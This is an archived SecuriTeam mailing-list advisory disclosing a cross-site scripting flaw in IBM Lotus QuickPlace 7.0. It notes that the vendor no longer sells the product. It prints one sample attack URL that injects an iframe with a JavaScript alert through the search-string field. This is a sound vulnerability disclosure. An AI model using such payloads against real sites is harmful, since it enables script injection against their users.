[NEWS] IBM Lotus QuickPlace Cross Site Scripting
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 19 Feb 2008 14:29:35 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
IBM Lotus QuickPlace Cross Site Scripting
------------------------------------------------------------------------
SUMMARY
IBM Lotus <http://www.ibm.com/software/lotus/products/quickplace/>
QuickPlace is "a business-ready, self-service work space expressly
designed for team collaboration". A vulnerability in the way IBM Lotus
QuickPlace handles incoming searches allows attackers to cause it to
insert arbitrary HTML and/or JavaScript.
DETAILS
Vulnerable Systems:
* IBM Lotus QuickPlace version 7.0
Exploit:
The following is a sample attack string:
http://website/QuickPlace/leg/Main.nsf/h_Toc/$new/?EditDocument&Form=h_RemoteUI&; PreSetFields=h_EditAction;h_New,h_SetReadScene;h_StdPageRead,h_SetEditScene; h_RemoteSearchResults,h_ReturnToPage;B4F8E49FCF2698BE862573F100705440,h_SetRemote; 1,h_SearchString;<iframe/ /onload=alert(/XSSByNirG/)></iframe,h_SearchAuthor; ,h_SearchDate;,h_SearchDateTypeString;,h_SearchOrder; ,h_SearchCount;15,h_SearchStart;0,h_SetErrorScene; h_RemoteError,h_SetEditCurrentScene;h_RemoteSearchResults,h_SetQuickBrowse; 1,h_SearchFolderScope;,h_SearchRoomScope;,h_SearchType;
Vendor response:
The product is no longer being sold, any active customer concerned about
this vulnerability should contact IBM Lotus QuickPlace support.
ADDITIONAL INFORMATION
The information has been provided by Nir Goldshlager (Avnet Israel).
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [NT] Lst Network Print Server Format String and Buffer Overflow
- Next by Date: [NT] Foxit Remote Access Server Two Heap Overflows
- Previous by thread: [NT] Lst Network Print Server Format String and Buffer Overflow
- Next by thread: [NT] Foxit Remote Access Server Two Heap Overflows
- Index(es):
Relevant Pages
|
|
